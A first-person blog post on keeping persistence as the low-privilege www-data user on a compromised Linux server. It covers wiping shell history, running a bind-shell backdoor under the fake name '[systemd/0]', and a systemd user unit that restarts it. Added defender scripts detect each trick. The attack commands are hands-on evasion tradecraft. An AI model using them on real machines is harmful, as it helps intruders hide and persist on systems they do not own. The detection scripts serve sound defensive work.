a8888b.
             d888888b.
             8P"YP"Y88
             8|o||o|88
             8'    .88
             8`._.' Y8.
            d/      `8b.
           dP   .    Y8b.
          d8:'  "  `::88b
         d8"         'Y88b
        :8P    '      :888
         8a.   :     _a88P
       ._/"Yaa_:   .| 88P|
       \    YP"    `| 8P  `.
       /     \.___.d|    .'
       `--..__)8888P`._.'
┌───────────────────────────────────────────────────┐
|                Non-Root Techniques                |
\───────────────────────────────────────────────────/
|[0x1] Preventing logs
|[0x2] bind-shell & camouflage the process
|[0x3] Creating a backdoor in systemd
└───────────────────────────────────────────────────┘
[Menu]


Hello People, today I'm going to explain some techniques I use on a daily basis on compromised boxes to stay persistent even as an unprivileged user.
To set the scene: we have an initial shell as the www-data user and we ask ourselves... how do we leave a backdoor?
Well, as a user without many privileges we only have a home directory and little else. For decent persistence, when you are sure the machine stays on 24/7,
I recommend leaving your stuff in /dev/shm/, the shared-memory tmpfs: it lives in RAM, so it is rarely inspected, but it is wiped on reboot (hence the 24/7 condition).
shm = shared memory. Assuming you decided to put yourself in /dev/shm, it is good practice (not strictly necessary) to create a directory with an unobtrusive name,
something like /dev/shm/... (three dots) or whatever blends in with the box. It's important to always clean up your tracks on a machine; I always like to unset
the environment variables that would make the shell write a log of what I typed.

[0x1] Preventing logs
┌───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┐
|www-data@server:~$ unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG USERHOST REMOTEHOST WATCH; history -n; export HISTFILE=/dev/null; history -c
└───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────┘

In crude terms, this removes the environment variables that tell the shell where to log what you type (the bash/zsh history). HISTFILE is the one that matters for bash and zsh;
the others in the list belong to other shells and are harmless to unset.
`history -n` re-reads any lines of the history file not yet loaded into memory, without printing them; with HISTFILE already unset it has nothing left to read, so here it is effectively a no-op.
`export HISTFILE=/dev/null` makes the shell write the history it would save at exit into /dev/null, i.e. nowhere.
and lastly `history -c` clears the in-memory list of the commands we typed previously :D
Two caveats: `history -c` is bash syntax (zsh rejects it; there, unsetting HISTFILE already stops the file from being written, and `fc -p` switches to a fresh, empty history list),
and all of this only silences the shell's own history. auditd, process accounting, the web server's access log and anything reading /proc still see you.
This way we have a safe, clean and trouble-free entrance
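As an added example (not code from the original post), here is the attacker side of the trick as a function next to the defender side, a profile snippet that makes the history variables read-only and flushes every command as it is typed. The function names, the readonly approach and the use of HISTSIZE=0 are my additions and assume bash semantics for HISTFILE/HISTSIZE; the check at the end shows that `unset HISTFILE` no longer sticks once the variables are locked.

```sh
#!/bin/sh
# Added example, not from the original post. Assumes bash for the HISTFILE/HISTSIZE
# semantics; the readonly/unset behaviour is POSIX.

# Attacker side (the post's trick): make the shell forget its history.
# Bash writes HISTFILE only at exit, so pointing it at /dev/null and keeping zero
# lines in memory is enough as long as nothing flushes history earlier.
forget_history() {
    unset HISTFILE HISTSIZE HISTFILESIZE 2>/dev/null
    HISTFILE=/dev/null; export HISTFILE
    HISTSIZE=0; export HISTSIZE        # my addition: bash keeps no history lines at all
}

# Defender side: a snippet for /etc/profile.d/ or /etc/bash.bashrc that makes the
# variables read-only (so `unset` and reassignment fail) and, in bash, appends each
# command to the file immediately instead of waiting for the shell to exit.
lock_history() {
    HISTFILE=${1:-"$HOME/.bash_history"}
    HISTSIZE=10000; HISTFILESIZE=10000
    readonly HISTFILE HISTSIZE HISTFILESIZE
    PROMPT_COMMAND='history -a'        # bash only; a plain variable elsewhere
}

# Returns 0 if HISTFILE survives the attacker's unset/redirect attempt after locking.
histfile_survives_unset() {
    lock_history
    # both commands fail against a readonly variable; run them in a subshell so a
    # POSIX shell that aborts on the error does not take this function with it
    ( unset HISTFILE; HISTFILE=/dev/null ) 2>/dev/null || true
    [ "$HISTFILE" != /dev/null ] && [ -n "$HISTFILE" ]
}
```

Read-only variables only raise the bar: they apply to the shell process that sourced the profile, so an attacker can still start a fresh `env -i bash --norc --noprofile` that never sees them. Pair the snippet with execve logging (auditd) if you actually want a record of what was typed.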

Now, how could we maintain persistence as an unprivileged user? I'll cover one way of doing this below:

[0x2] bind-shell & camouflage the process
There are many bind shells, in many languages and with many approaches; I'll use one I got from GitHub as an example.
Now think about it: running backdoor.elf with that name showing up in ps aux is a bit crazy, isn't it?
So let's mask the process using what Linux itself gives us! I'll show you in practice how to do this.

┌───────────────────────────────────────────────────────────────────────────────────────────────────────────┐
|www-data@server:~$ exec -a "[systemd/0]" ./backdoor & //exec in a background subshell: argv[0] becomes [systemd/0] and our own shell survives
|www-data@server:~$ [1] 546739 //process pid
|www-data@server:~$ ps fHw //Checking the name change
| PID    TTY     STAT    TIME COMMAND
|5422   pts/1     Ss+    0:00 /usr/bin/zsh
|546739 pts/0     SN     0:00 [systemd/0] //Voilà!
|554847 pts/0     R+     0:00 ps fHw
└───────────────────────────────────────────────────────────────────────────────────────────────────────────┘

Fairly self-explanatory: `-a` tells bash to pass a different argv[0] to the program, and argv[0] is what ps prints in the COMMAND column. I chose "[systemd/0]" because
on a Unix-like system there are plenty of processes shown as [something] (the kernel threads), and systemd is a name that already exists on the box, so it is confused
with the real thing more easily :D
Keep in mind what this does not change: /proc/PID/exe still points at ./backdoor, /proc/PID/comm (ps -o comm) still shows the real file name, and a genuine kernel thread
has an empty /proc/PID/cmdline, no TTY and kthreadd (PID 2) as its parent, whereas our process sits on pts/0 with our shell as its parent, as the ps output above shows.
Anyone who looks past the COMMAND column will spot it.
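The flip side of the trick, as an added example that is not part of the original post: a small hunt over /proc that lists processes dressed up as kernel threads. It relies on the fact that `exec -a` only rewrites argv[0], while real kernel threads have an empty /proc/PID/cmdline and no /proc/PID/exe target. The function names are mine and the script assumes a Linux /proc.

```sh
#!/bin/sh
# Added example (not from the original post): hunting processes that hide behind a
# kernel-thread-style name. `exec -a "[systemd/0]"` only rewrites argv[0]; it cannot
# touch what the kernel reports elsewhere in /proc. Genuine kernel threads have an
# EMPTY /proc/PID/cmdline (ps prints their comm in brackets for exactly that reason)
# and no /proc/PID/exe target, so a bracketed argv[0] with a non-empty cmdline is an
# impostor.

# Return 0 when PID is a user process whose argv[0] is dressed up as [something].
is_fake_kthread() {
    pid=$1
    [ -r "/proc/$pid/cmdline" ] || return 1
    # argv[0] is the first NUL-terminated string in cmdline
    argv0=$(tr '\0' '\n' < "/proc/$pid/cmdline" 2>/dev/null | head -n 1)
    [ -n "$argv0" ] || return 1          # empty cmdline: real kernel thread (or zombie)
    case "$argv0" in
        \[*\]) return 0 ;;               # looks like [kworker/0:1], [systemd/0], ...
        *)     return 1 ;;
    esac
}

# The binary really being executed, which argv[0] cannot hide.
real_exe() {
    readlink "/proc/$1/exe" 2>/dev/null
}

# Walk /proc and print "PID<TAB>fake cmdline<TAB>real executable" for each impostor.
hunt_fake_kthreads() {
    for d in /proc/[0-9]*; do
        pid=${d#/proc/}
        if is_fake_kthread "$pid"; then
            printf '%s\t%s\t%s\n' "$pid" "$(tr '\0' ' ' < "$d/cmdline" 2>/dev/null)" "$(real_exe "$pid")"
        fi
    done
}
```

Run `hunt_fake_kthreads` as root to see every user's processes; unprivileged, readlink on other users' exe links fails and the third column stays empty, but the first two already give the impostor away. Adding a parent-PID check (real kernel threads descend from PID 2) would catch argv[0] rewrites that avoid brackets altogether.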

[0x3] Creating a backdoor in systemd
Well, if you're worried the machine might reboot and your backdoor go offline, you can create a systemd user service so it comes back after a restart.
To make this possible we go to our user's home and create ~/.config/systemd/user/, the directory where the per-user systemd instance looks for unit files
(www-data's home is /var/www, which is why the backdoor path below starts there).
Our unit will be as simple as possible: a service that runs an executable at /var/www/.config/.../backdoor.elf and already hides the process with the exec trick :D
Let's put the following in ~/.config/systemd/user/backdoor.service:

┌───────────────────────────────────────────────────────────────────────────────────────────────────────────┐
|[Unit]
|Description=cuttie backdoor
|After=network.target
|
|[Service]
|# exec replaces bash with the backdoor under the fake argv[0]. No trailing "&":
|# with it bash exits at once, systemd kills the whole cgroup and restarts it every 3 s
|ExecStart=/bin/bash -c 'exec -a "[systemd/0]" /var/www/.config/.../backdoor.elf'
|Restart=always
|RestartSec=3
|
|[Install]
|# user units hang off default.target; multi-user.target only exists in the system manager
|WantedBy=default.target
└───────────────────────────────────────────────────────────────────────────────────────────────────────────┘

then we activate the unit with the following commands:

┌───────────────────────────────────────────────────────────────────────────────────────────────────────────┐
|www-data@server:~$ systemctl --user daemon-reload //Updating user services
|www-data@server:~$ systemctl --user start backdoor //starting the service
|www-data@server:~$ systemctl --user enable backdoor //service to start automatically on boot
└───────────────────────────────────────────────────────────────────────────────────────────────────────────┘

With this, if the machine reboots or the process is killed, the service is re-created uwu, and a sleepy sysadmin will take a long time to notice and understand what is going on HuehuEhUe
One big caveat: the per-user instance (systemd --user) only runs while that user has a session, and www-data normally never logs in, so at boot nothing starts our unit unless
lingering is enabled with `loginctl enable-linger www-data`, which normally needs root. From a web shell, `systemctl --user` also needs XDG_RUNTIME_DIR and a running user
instance to talk to; if you get "Failed to connect to bus", there is no user manager for www-data on that box and you need another persistence method (the bind shell above, a cron entry if you have one, ...).
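For the defender side of this section, here is an added example (not from the original post) that walks home directories for user-level units and flags the patterns used above: an `exec -a` rewrite in ExecStart, or a binary living in /dev/shm, /tmp or a dot-directory like /var/www/.config/.../. The function names, the directory list and the suspicion heuristic are my assumptions; tune them for your own estate.

```sh
#!/bin/sh
# Added example (not from the original post): hunting user-level systemd persistence.
# Per-user units live in ~/.config/systemd/user/ (and ~/.local/share/systemd/user/),
# so a defender has to walk every home directory, including service accounts such as
# /var/www, instead of only looking at /etc/systemd/system.
# Usage: hunt_user_units /home /root /var/www

# Print "unit path<TAB>ExecStart" for every user unit found below the given directories.
list_user_units() {
    for base in "$@"; do
        [ -d "$base" ] || continue
        find "$base" -path '*/.config/systemd/user/*.service' \
                  -o -path '*/.local/share/systemd/user/*.service' 2>/dev/null |
        while read -r unit; do
            exec_line=$(sed -n 's/^ExecStart=//p' "$unit" | head -n 1)
            printf '%s\t%s\n' "$unit" "$exec_line"
        done
    done
}

# Heuristic (my assumption, tune it): flag ExecStart lines that use the post's tricks,
# i.e. an argv[0] rewrite via `exec -a`, or a binary living in /dev/shm, /tmp or a
# dot-directory such as /var/www/.config/.../.
is_suspicious_exec() {
    case "$1" in
        *"exec -a "*|*/dev/shm/*|*/tmp/*|*/.[!/]*/*) return 0 ;;
        *) return 1 ;;
    esac
}

# Report every unit tagged SUSPICIOUS or ok, so the output can be diffed over time.
hunt_user_units() {
    list_user_units "$@" | while IFS="$(printf '\t')" read -r unit exec_line; do
        if is_suspicious_exec "$exec_line"; then
            printf 'SUSPICIOUS\t%s\t%s\n' "$unit" "$exec_line"
        else
            printf 'ok\t%s\t%s\n' "$unit" "$exec_line"
        fi
    done
}
```

The dot-directory rule will also flag legitimate units that run something from ~/.local/bin, which is why the script prints the ok lines too: keep a baseline and look at what changed rather than at the tag alone. `systemctl --user list-units` would not help here, since the unit is only loaded when that user's manager is running.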
that's it I guess... I hope to update this over time if I find a few more things.
this is my first blog post, I hope someone actually reads it... or not :D